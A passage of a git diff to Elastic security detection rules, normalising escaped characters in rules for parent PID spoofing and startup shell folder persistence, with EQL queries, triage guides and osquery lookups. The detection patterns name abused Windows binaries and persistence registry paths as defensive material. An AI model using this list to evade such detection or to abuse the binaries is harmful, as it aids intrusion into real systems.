\"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid > 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", "references": [ "https://blog.didierstevens.com/2017/03/20/" ], @@ -100,7 +100,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_105.json b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_105.json index e836d04776a..69608eb0958 100644 --- a/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c88d4bd0-5649-4c52-87ea-9be59dbfbcf2_105.json @@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Parent Process PID Spoofing", - "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n \"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid \u003e 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", + "query": "/* This rule is compatible with Elastic Endpoint only */\n\nsequence by host.id, user.id with maxspan=3m \n\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.Ext.token.integrity_level_name != \"system\" and \n (\n process.pe.original_file_name : (\"winword.exe\", \"excel.exe\", \"outlook.exe\", \"powerpnt.exe\", \"eqnedt32.exe\",\n \"fltldr.exe\", \"mspub.exe\", \"msaccess.exe\", \"powershell.exe\", \"pwsh.exe\",\n \"cscript.exe\", \"wscript.exe\", \"rundll32.exe\", \"regsvr32.exe\", \"msbuild.exe\",\n \"mshta.exe\", \"wmic.exe\", \"cmstp.exe\", \"msxsl.exe\") or \n \n (process.executable : (\"?:\\\\Users\\\\*.exe\",\n \"?:\\\\ProgramData\\\\*.exe\",\n \"?:\\\\Windows\\\\Temp\\\\*.exe\",\n \"?:\\\\Windows\\\\Tasks\\\\*\") and \n (process.code_signature.exists == false or process.code_signature.status : \"errorBadDigest\")) or \n \n process.executable : \"?:\\\\Windows\\\\Microsoft.NET\\\\*.exe\" \n ) and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.pid\n [process where host.os.type == \"windows\" and event.type == \"start\" and\n process.parent.Ext.real.pid > 0 and \n \n /* process.parent.Ext.real.pid is only populated if the parent process pid doesn't match */\n not (process.name : \"msedge.exe\" and process.parent.name : \"sihost.exe\") and \n \n not process.executable : \n (\"?:\\\\Windows\\\\System32\\\\WerFaultSecure.exe\", \n \"?:\\\\WINDOWS\\\\SysWOW64\\\\WerFaultSecure.exe\",\n \"?:\\\\Windows\\\\System32\\\\WerFault.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\WerFault.exe\")\n ] by process.parent.Ext.real.pid\n", "references": [ "https://blog.didierstevens.com/2017/03/20/" ], @@ -101,7 +101,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -123,7 +123,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_1.json b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_1.json index 29c554456db..d88ff660472 100644 --- a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_1.json +++ b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_1.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_2.json b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_2.json index 1c5d4f31611..d20005c29c7 100644 --- a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_2.json +++ b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_2.json @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_3.json b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_3.json index da77435ed9c..988cceb9be7 100644 --- a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_3.json +++ b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_3.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_4.json b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_4.json index 02735569429..54257a1835c 100644 --- a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_4.json +++ b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_4.json @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_5.json b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_5.json index e0f0a60d734..2fca592136b 100644 --- a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_5.json +++ b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_5.json @@ -82,7 +82,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_6.json b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_6.json index 4488d456529..e0a9f3f901a 100644 --- a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_6.json +++ b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_6.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_7.json b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_7.json index 72625b3e0e7..a9e1b8a1b21 100644 --- a/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_7.json +++ b/packages/security_detection_engine/kibana/security_rule/c8935a8b-634a-4449-98f7-bb24d3b2c0af_7.json @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", diff --git a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_104.json b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_104.json index 15bfc9d17b7..ed5fd922977 100644 --- a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_104.json +++ b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_104.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Startup Shell Folder Modification", - "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - $osquery_0\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - $osquery_1\n - $osquery_2\n - $osquery_3\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\"\n ) and\n registry.data.strings != null and\n /* Normal Startup Folder Paths */\n not registry.data.strings : (\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%ProgramData%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\n )\n", "related_integrations": [ { @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_105.json b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_105.json index 90889b85a27..0971ce8658a 100644 --- a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_105.json +++ b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_105.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Startup Shell Folder Modification", - "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Review the source process and related file tied to the Windows Registry entry.\n- Validate if the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- There is a high possibility of benign legitimate programs being added to shell folders. This activity could be based on new software installations, patches, or other network administrator activity. Before undertaking further investigation, it should be verified that this activity is not benign.\n\n### Related rules\n\n- Startup or Run Key Registry Modification - 97fc44d3-8dae-4019-ae83-298c3015600f\n- Persistent Scripts in the Startup Directory - f7c4dc5a-a58d-491d-9f14-9b66507121c0\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- If the malicious file was delivered via phishing:\n - Block the email sender from sending future emails.\n - Block the malicious web pages.\n - Remove emails from the sender from mailboxes.\n - Consider improvements to the security awareness program.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "registry where host.os.type == \"windows\" and\n registry.path : (\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"HKLM\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"HKEY_USERS\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\MACHINE\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Common Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\\\\Startup\",\n \"\\\\REGISTRY\\\\USER\\\\*\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Shell Folders\\\\Startup\"\n ) and\n registry.data.strings != null and\n /* Normal Startup Folder Paths */\n not registry.data.strings : (\n \"C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%ProgramData%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"%USERPROFILE%\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\",\n \"C:\\\\Users\\\\*\\\\AppData\\\\Roaming\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\"\n )\n", "related_integrations": [ { @@ -51,7 +51,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_106.json b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_106.json index de10640d26e..e3c8b9cafdd 100644 --- a/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_106.json +++ b/packages/security_detection_engine/kibana/security_rule/c8b150f0-0164-475b-a75e-74b47800a9ff_106.json @@ -12,7 +12,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Startup Shell Folder Modification", - "note": "## Triage and analysis\n\n### Investigating Suspicious Startup Shell Folder Modification\n\nTechniques used within malware and by adversaries often leverage the Windows registry to store malicious programs for persistence. Startup shell folders are often targeted as they are not as prevalent as normal Startup folder paths so this behavior may evade existing AV/EDR solutions. These programs may also run with higher privileges which can be ideal for an attacker.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent 